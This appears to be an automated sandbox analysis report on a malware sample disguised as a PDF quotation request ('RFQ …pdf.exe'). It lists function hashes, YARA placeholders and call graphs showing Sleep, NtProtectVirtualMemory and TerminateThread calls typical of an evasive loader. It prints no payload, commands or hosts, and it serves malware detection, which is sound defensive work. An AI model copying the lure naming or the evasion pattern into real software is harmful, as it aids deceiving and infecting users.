                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 70b5e60d41ade039c7194a8c2ea8dfe52289a7a37702edf810432506e9e36545
                              • Instruction ID: e1db3d8bac4beeb0fde98a63efa7ff96b1e8d579dfd95bbf0bc55ac2bbc6c821
                              • Opcode Fuzzy Hash: 70b5e60d41ade039c7194a8c2ea8dfe52289a7a37702edf810432506e9e36545
                              • Instruction Fuzzy Hash: 50510E3150838ADFDF7A9E25CE54BEE77A1AF05340F05482EDE8A5B211E7395A40EF12
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B70F1, Relevance: .1, Instructions: 127COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 420cbe4e4b5529a1d8424262d86af733af666de5490eb2bf5ba5be829be1fd2e
                              • Instruction ID: 24800e2bb90516cdbaa615c38f69494cb20bcba4083b119c3e2aa952a29681e0
                              • Opcode Fuzzy Hash: 420cbe4e4b5529a1d8424262d86af733af666de5490eb2bf5ba5be829be1fd2e
                              • Instruction Fuzzy Hash: 53411473A013448FDB72CE2689D43DBBBE2AFD6305F55451ACD8E8B221C331AA82D751
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7162, Relevance: .1, Instructions: 126COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d7f346c3fcf198ee1c8112507f527d9db2ff9ae893d2d1cc560caa38b280b04e
                              • Instruction ID: 3957459b8b1507169190ca9284cab2afe99e1079d0ef401b1828bb28463b1846
                              • Opcode Fuzzy Hash: d7f346c3fcf198ee1c8112507f527d9db2ff9ae893d2d1cc560caa38b280b04e
                              • Instruction Fuzzy Hash: 8A51F473A013449FDB72CE2689D43DBBBE2AFD5305F55451ACC4E8B624C330A681DB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B9D09, Relevance: .1, Instructions: 126COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b50479c8cbb8d39d6ffb0e20ddc78e29119e538c8f37cd32caf744ee1d4a67fa
                              • Instruction ID: 43c33fdaa0f85078249a2d6dbb5912297e5f48b3da0475f4dc6159aeb0fe07b3
                              • Opcode Fuzzy Hash: b50479c8cbb8d39d6ffb0e20ddc78e29119e538c8f37cd32caf744ee1d4a67fa
                              • Instruction Fuzzy Hash: 6551BC3150838ADFCB7A9E25CE51BEE77A2AF05340F05442EDD8A9B211E7354A40EF52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B9CF1, Relevance: .1, Instructions: 123COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1083b12f73e42503a0ffac29d363195b2be4a4ff52685b984ea3c21848ee6c95
                              • Instruction ID: 120b345a3adcd19b732597a2adacf7899261b084bef13135ad710015177e8e17
                              • Opcode Fuzzy Hash: 1083b12f73e42503a0ffac29d363195b2be4a4ff52685b984ea3c21848ee6c95
                              • Instruction Fuzzy Hash: 6551103250438ADFCF7A8E25CE04BEE77A1AF05340F05442EDE8A5B210E7355A40EF16
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B9CFD, Relevance: .1, Instructions: 121COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4fe7e5be1f919afff0a6d696c25a00399e45c5ffd09360170d78b4fed71bfa0c
                              • Instruction ID: 42613574a857d7b8e5d97922311cd210c308975651c5fdb230a6ce4fd169d2bc
                              • Opcode Fuzzy Hash: 4fe7e5be1f919afff0a6d696c25a00399e45c5ffd09360170d78b4fed71bfa0c
                              • Instruction Fuzzy Hash: 3751FF7250838ADFCF7A8E25CE50BEE77A1AF05340F05442EDD8A6B211E3394A00EF12
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B70FD, Relevance: .1, Instructions: 119COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4784221ccdd58e424e000cd8bc33cdab295ce985e0bb55aed05d4788e00564c9
                              • Instruction ID: 5dbf8e81e5f2db3792f074fcc712e0b40588802ee91bea80e9fc810f0825b635
                              • Opcode Fuzzy Hash: 4784221ccdd58e424e000cd8bc33cdab295ce985e0bb55aed05d4788e00564c9
                              • Instruction Fuzzy Hash: C741F573A013448FDB72CE2589D43DBBBE2AFD5305F56051ACD8E9B620C335AA81DB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B713D, Relevance: .1, Instructions: 109COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7b63c75f0b23bd1f18c1b49a70aac19b9d603a36f80294bc9993094afdbca014
                              • Instruction ID: 7098bdf49162e555be9cfc5023ca0722aab7ae2ccb923c2c963b121853a67e22
                              • Opcode Fuzzy Hash: 7b63c75f0b23bd1f18c1b49a70aac19b9d603a36f80294bc9993094afdbca014
                              • Instruction Fuzzy Hash: 5C412672A053449FDB728E2989D43DABBE2AF96305F55051ACC8E8B221C331A682D756
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7149, Relevance: .1, Instructions: 104COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d49bd540e6a131ca9e4fbe2de1eba7903dee440e83eb8f0c447960683c90c59e
                              • Instruction ID: 786972c073245bc4c443b6b707e59c412c19cdb80fdd2e49b303586d3edf9221
                              • Opcode Fuzzy Hash: d49bd540e6a131ca9e4fbe2de1eba7903dee440e83eb8f0c447960683c90c59e
                              • Instruction Fuzzy Hash: 8E411673A113048FDB728E2989D43DBBBE2AFD5305F550516CD8E9B320C330A681D756
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B712C, Relevance: .1, Instructions: 103COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a6af9cac29f6dcd2b841ee892661998d706926ffec6a96e2a617b3511076ad9f
                              • Instruction ID: f025b9a2ccba9197c2972ed0a52464945de3f0bbf87898c8b59b3ea0f175863b
                              • Opcode Fuzzy Hash: a6af9cac29f6dcd2b841ee892661998d706926ffec6a96e2a617b3511076ad9f
                              • Instruction Fuzzy Hash: 4341F673A013048FDB72CE2589943DBBBE2AFD6305F5545168D8E9B220C330AA81D756
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B71DC, Relevance: .1, Instructions: 84COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: cb1ab56d786561fe460f97dcdd58fb3eec012f058c7de62107c0dc367a0b3bc3
                              • Instruction ID: ab1327a338e847487e5ebbd29ca7e9087e4d94687565c9b55fecb5cb22e75ecf
                              • Opcode Fuzzy Hash: cb1ab56d786561fe460f97dcdd58fb3eec012f058c7de62107c0dc367a0b3bc3
                              • Instruction Fuzzy Hash: 2E316973911344CFCB728E298D943DBBBE26FE5305F6A411B8C8E97621C370A681D756
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020BD0C6, Relevance: .1, Instructions: 72COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a5b24317e891bb4cc8ae9a574a25e97460dcd5caf5a2cce60ff69f12363a894c
                              • Instruction ID: 1b29b42b1e32157d7b4898f251518e01631be2857cd46bb65e2ef34ee85c23b8
                              • Opcode Fuzzy Hash: a5b24317e891bb4cc8ae9a574a25e97460dcd5caf5a2cce60ff69f12363a894c
                              • Instruction Fuzzy Hash: CB216B6148C3C58FCB278B308C695C6BF616E13220B1B82DFC8D68F4A3D3644546DB63
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B7568, Relevance: .1, Instructions: 67COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 300a34fb4500db685263c994dd7b8ff1987de12a3cc44ae10ea40fca30318b37
                              • Instruction ID: 4d871ee178d53c0896c8cfc974a9add76c8bd77596c7736689bbc18ee68f6d1d
                              • Opcode Fuzzy Hash: 300a34fb4500db685263c994dd7b8ff1987de12a3cc44ae10ea40fca30318b37
                              • Instruction Fuzzy Hash: 87210776945344DBEB76CE3D8C40ACBB3A76FC4720F12441B9C18E7268D27089429B52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020BB562, Relevance: .1, Instructions: 66COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1b5b2be285018be8b90132e244f2f24fef6fbb2d2bd0d93f05f73249603f898a
                              • Instruction ID: 1a936a3d0fc4a980e30df96c4308d4bef6873d5f143c030788bb1f27c4c7a6f5
                              • Opcode Fuzzy Hash: 1b5b2be285018be8b90132e244f2f24fef6fbb2d2bd0d93f05f73249603f898a
                              • Instruction Fuzzy Hash: 2F21086144D3C58FCB278B3088A959ABF616E1722071F82DFC8D68F8A3D3549846E763
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020BC7BF, Relevance: .0, Instructions: 43COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b63de4371f970d6f392b618b5eb55312484c6f69073944e532e5be052767ef48
                              • Instruction ID: 0de6f04b4ad305207825e22f021a5de0e79e216170fc3bce1ec9f38df2bc93d3
                              • Opcode Fuzzy Hash: b63de4371f970d6f392b618b5eb55312484c6f69073944e532e5be052767ef48
                              • Instruction Fuzzy Hash: 14112774250789CFEB36DF08C994BED33B1BF18314F01806ADC4A9B624C330AA41EB56
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020B8F54, Relevance: .0, Instructions: 7COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3249085042b5c81622bb30ec217fd686faed98189aece80b2d8dfdfc3beb419a
                              • Instruction ID: 01e2cf8b276d2ef7b5d123c4d0f61505733a43f25e34f4765dbe00071480a08f
                              • Opcode Fuzzy Hash: 3249085042b5c81622bb30ec217fd686faed98189aece80b2d8dfdfc3beb419a
                              • Instruction Fuzzy Hash: AAB092FA2026C18FFB45DF08C482B0073B0FB10A88F080490E402CB712C224E900CA00
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 020BBAA1, Relevance: .0, Instructions: 6COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, Offset: 020B0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_20b0000_RFQ 001030112021#U00b7pdf.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 42df08f4c91467dfd747bad63ccbad0b2141c3406cdb54ecfc2dcf843d4e06c8
                              • Instruction ID: f524559b10004a760a8e9cebaeb784666b97cd603d29b2a10d0d0579ea74874d
                              • Opcode Fuzzy Hash: 42df08f4c91467dfd747bad63ccbad0b2141c3406cdb54ecfc2dcf843d4e06c8
                              • Instruction Fuzzy Hash: C8B09235651640CFCEA6CA08C180E8473B0FB01600B8104D0E80187A51D264E801CA00
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Analysis Process: RFQ 001030112021#U00b7pdf.exe PID: 7156 Parent PID: 4692 RFQ 001030112021#U00b7pdf.exeCOMMON

                              Execution Graph

                              Execution Coverage:3.4%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:0%
                              Total number of Nodes:34
                              Total number of Limit Nodes:0

                              Graph

                              execution_graph 659 56ff15 Sleep 660 56ff22 NtProtectVirtualMemory 659->660 662 56ffa8 660->662 663 56fdb5 664 56fe15 NtProtectVirtualMemory 663->664 727 56fe95 728 56ff10 Sleep 727->728 730 56ff22 NtProtectVirtualMemory 728->730 732 56ffa8 730->732 671 56fe50 673 56fed0 671->673 672 56ff22 NtProtectVirtualMemory 676 56ffa8 672->676 673->672 674 56ff16 Sleep 673->674 674->672 739 56fcb9 740 56fd34 NtProtectVirtualMemory 739->740 735 56fe85 736 56ff04 NtProtectVirtualMemory 735->736 738 56ffa8 736->738 666 56f9e2 667 56f966 TerminateThread 666->667 668 56f9e5 TerminateThread 666->668 670 56fa36 667->670 668->670 692 56f961 693 56f9dc TerminateThread 692->693 694 56fa36 693->694 713 56fc21 715 56fc9c 713->715 714 56fe39 715->714 716 56fe18 NtProtectVirtualMemory 715->716 695 56f96d 696 56f971 695->696 696->696 697 56f9dc TerminateThread 696->697 698 56fa36 697->698

                              Callgraph

                              • Executed
                              • Not Executed
                              • Opacity -> Relevance
                              • Disassembly available
                              callgraph 0 Function_0056FA57 1 Function_0056FF55 2 Function_0056F955 3 Function_0056FB55 4 Function_0056FE50 5 Function_0056FC5E 4->5 67 Function_0056FCC8 5->67 6 Function_0056FE58 7 Function_0056FD59 8 Function_0056FB45 9 Function_00570242 10 Function_0056FF4C 11 Function_0056FD4D 12 Function_0056FB4D 13 Function_0056FF48 14 Function_0056F949 15 Function_0056FB79 16 Function_0056FE79 17 Function_0056FF79 17->5 18 Function_00570164 19 Function_0056FF61 20 Function_0056FE61 20->5 21 Function_0056FB61 22 Function_0056F961 23 Function_0056FF6D 24 Function_0056FE6D 25 Function_0056F96D 26 Function_0056FB6D 27 Function_0056FB17 28 Function_00570015 29 Function_0056FF15 29->5 30 Function_0056FE11 31 Function_0056FA11 32 Function_0056FA1D 33 Function_0056FB19 34 Function_0056FA06 35 Function_0056FD07 35->5 42 Function_0056FC31 35->42 36 Function_0056FE05 37 Function_0056FD00 37->5 37->42 38 Function_0056FF00 39 Function_0056FA08 40 Function_0056FF09 40->5 41 Function_0056FD30 43 Function_0056FD38 44 Function_0056FB39 45 Function_00570021 46 Function_0056FC21 46->5 46->42 47 Function_0056FB21 48 Function_0057002D 49 Function_0056FB2D 50 Function_0056FA29 51 Function_0056FCD5 52 Function_005700D1 53 Function_0056FAD1 54 Function_0056FADD 55 Function_0056FFD9 56 Function_005700C5 57 Function_0056FCC5 58 Function_005703C4 59 Function_0056FEC2 59->5 60 Function_0056FAC0 61 Function_0056FFC0 62 Function_005701C0 63 Function_0056FCCC 64 Function_005700CD 65 Function_0056FFCD 66 Function_0056FAC8 68 Function_005700C9 69 Function_0056FAF5 70 Function_005703F4 71 Function_0056FCF0 72 Function_0056FEF1 73 Function_0056FFF1 74 Function_005703F0 75 Function_0056FBFD 76 Function_005703FC 77 Function_0056FBF9 78 Function_0056FDF9 79 Function_0056FCF9 80 Function_005703F8 81 Function_0056FDE5 82 Function_0056FFE5 83 Function_0056F9E2 84 Function_0056FCE1 85 Function_0056FDED 86 Function_0056FAE9 87 Function_0056FC96 87->5 87->42 88 Function_0056FB94 89 Function_0056FC94 90 Function_0056FE95 90->5 91 Function_0056FB90 92 Function_0056FD91 93 Function_0056FB9D 94 Function_0056FD9D 95 Function_0056FC98 96 Function_0056FD84 97 Function_0056FE85 97->5 98 Function_0056FD88 99 Function_00570288 100 Function_0056F9B4 101 Function_0056FBB5 102 Function_0056FDB5 103 Function_0056F9BD 104 Function_005702B9 105 Function_0056FCB9 106 Function_0056FEB9 106->5 107 Function_0056FEA4 108 Function_0056F9AC 109 Function_0056FCAD 109->5 109->42 110 Function_0056FEAD 110->5 111 Function_0056FBA9 112 Function_0056FDA9

                              Executed Functions

                              Function 0056FEC2, Relevance: 3.0, APIs: 2, Instructions: 45sleepCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 56fec2-56fed3 call 56fc5e 4 56fed5-56fed7 0->4 5 56fedc-56fee2 0->5 4->5 6 56ff24-56ffa0 NtProtectVirtualMemory 5->6 7 56fee4-56ff22 Sleep 5->7 10 56ffa8-56ffb9 6->10 11 56ffa3 call 56fc5e 6->11 7->6 13 56ffbb 10->13 11->10 13->13
                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: b3d607e475376b6cf51903a3afa98b2e08050bcdd01cadb338bb7275def0159c
                              • Instruction ID: cbff10af96eb3b41cd5ecb86ee968032617a488ea0a9ec3a0c1e6d1523666203
                              • Opcode Fuzzy Hash: b3d607e475376b6cf51903a3afa98b2e08050bcdd01cadb338bb7275def0159c
                              • Instruction Fuzzy Hash: C20122709043019FF7405F20D64DB96BBA4BF113A5F128195EC128B0B3C3B98C80CF51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0056FD07, Relevance: 1.6, APIs: 1, Instructions: 57nativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 66 56fd07-56fd19 68 56fd1f-56fd22 66->68 69 56fe39-56feb6 66->69 68->69 70 56fd28-56fd6f call 56fc31 call 56fc5e 68->70 70->69 78 56fd75-56fd78 70->78 78->69 79 56fd7e-56fe36 NtProtectVirtualMemory 78->79
                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FE1D
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: a5229797a4eb1c09ec6e4e97fbdd9f7a2b33e593acba13ba1391b1d6d5b122d1
                              • Instruction ID: 4291e0564a2e5fd5583f1e8873ac85b40d3727f2fa937cada9e1008007eaf36c
                              • Opcode Fuzzy Hash: a5229797a4eb1c09ec6e4e97fbdd9f7a2b33e593acba13ba1391b1d6d5b122d1
                              • Instruction Fuzzy Hash: CB1129B28013019FC7409F74E98EE2A3E69FF15360B6106A5D946CB176C735DC819B65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0056FC21, Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 110 56fc21-56fd6f call 56fc31 call 56fc5e 119 56fd75-56fd78 110->119 120 56fe39-56feb6 110->120 119->120 121 56fd7e-56fe36 NtProtectVirtualMemory 119->121
                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FE1D
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: 678a95198543671f4fb72feb7b581346c461a59420301e8f06170be05477cbd3
                              • Instruction ID: 474b55010c42ff2ba8c1b6f72e3c5715edc850df46b4a6da416308345564cdf7
                              • Opcode Fuzzy Hash: 678a95198543671f4fb72feb7b581346c461a59420301e8f06170be05477cbd3
                              • Instruction Fuzzy Hash: 6F0104B29053028FD3019F34A98E9253F74BE5936076546A6D845CB176C365DC429B26
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0056FD00, Relevance: 1.5, APIs: 1, Instructions: 48nativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 127 56fd00-56fd19 130 56fd1f-56fd22 127->130 131 56fe39-56feb6 127->131 130->131 132 56fd28-56fd6f call 56fc31 call 56fc5e 130->132 132->131 140 56fd75-56fd78 132->140 140->131 141 56fd7e-56fe36 NtProtectVirtualMemory 140->141
                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FE1D
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: e8a7cb7e18356e44e6a2bd39efba1514513fba7e6b0ec14bdcbf20f24f55903b
                              • Instruction ID: 6a07659f5602a76687b0c8a91f56f8b57b2a9605355380e050a8554a4b862365
                              • Opcode Fuzzy Hash: e8a7cb7e18356e44e6a2bd39efba1514513fba7e6b0ec14bdcbf20f24f55903b
                              • Instruction Fuzzy Hash: E601D2B29003029FD7109F35E98EA2A3F29FF143A0B5106A5E946CB177C736DC819B65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0056FCA1, Relevance: 1.5, APIs: 1, Instructions: 48nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FE1D
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: 0e6235905855202fb46aa23886b589d57845d9fce2fba2c6139c3b56af09a38d
                              • Instruction ID: 775e3d082a4c098dbd3f27ac0ad0a64dbb87b992e90c21f50857a6d61a9b4c6e
                              • Opcode Fuzzy Hash: 0e6235905855202fb46aa23886b589d57845d9fce2fba2c6139c3b56af09a38d
                              • Instruction Fuzzy Hash: 1D0145B19053028FC3009F34A98E92A3F74FF053A032646E6D845CB177C365E8419B26
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0056FCAD, Relevance: 1.5, APIs: 1, Instructions: 44nativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 145 56fcad-56fd6f call 56fc31 call 56fc5e 152 56fd75-56fd78 145->152 153 56fe39-56feb6 145->153 152->153 154 56fd7e-56fe36 NtProtectVirtualMemory 152->154
                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FE1D
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: ce7d6f169314ec977da2ddf83c1aef1518c33d2d077b2b1bc50f48b57588ac9d
                              • Instruction ID: c1d412a9e2093a8b7f82c0423fbb8b1e82ae91dc7d31442083047760ef20cedd
                              • Opcode Fuzzy Hash: ce7d6f169314ec977da2ddf83c1aef1518c33d2d077b2b1bc50f48b57588ac9d
                              • Instruction Fuzzy Hash: 54017BF19003028FD3009F34E98E9293F38FF143A076146A6D946C717AC721E841A725
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0056FC96, Relevance: 1.5, APIs: 1, Instructions: 42nativeCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 160 56fc96-56fd19 162 56fd1f-56fd22 160->162 163 56fe39-56feb6 160->163 162->163 164 56fd28-56fd6f call 56fc31 call 56fc5e 162->164 164->163 172 56fd75-56fd78 164->172 172->163 173 56fd7e-56fe36 NtProtectVirtualMemory 172->173
                              APIs
                              • NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056FE1D
                              Memory Dump Source
                              • Source File: 00000008.00000002.891917928.000000000056F000.00000040.00000001.sdmp, Offset: 0056F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_56f000_RFQ 001030112021#U00b7pdf.jbxd
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID:
                              • API String ID: 2706961497-0
                              • Opcode ID: 816d84d5e1b550b7413a6a4b195e3004ac0bf39d398f85409d205702c574b5cc
                              • Instruction ID: d0ce33d7aa8ddfd53205c5f7bb631e6797d209395485e1af3042ecc15c7847bf
                              • Opcode Fuzzy Hash: 816d84d5e1b550b7413a6a4b195e3004ac0bf39d398f85409d205702c574b5cc
                              • Instruction Fuzzy Hash: 4001F7B28003028FD7109F34E98EA2A3F29FF14360F6116A5D906CB1B7C735DC819B25
                              Uniqueness

                              Uniqueness Score: -1.00%

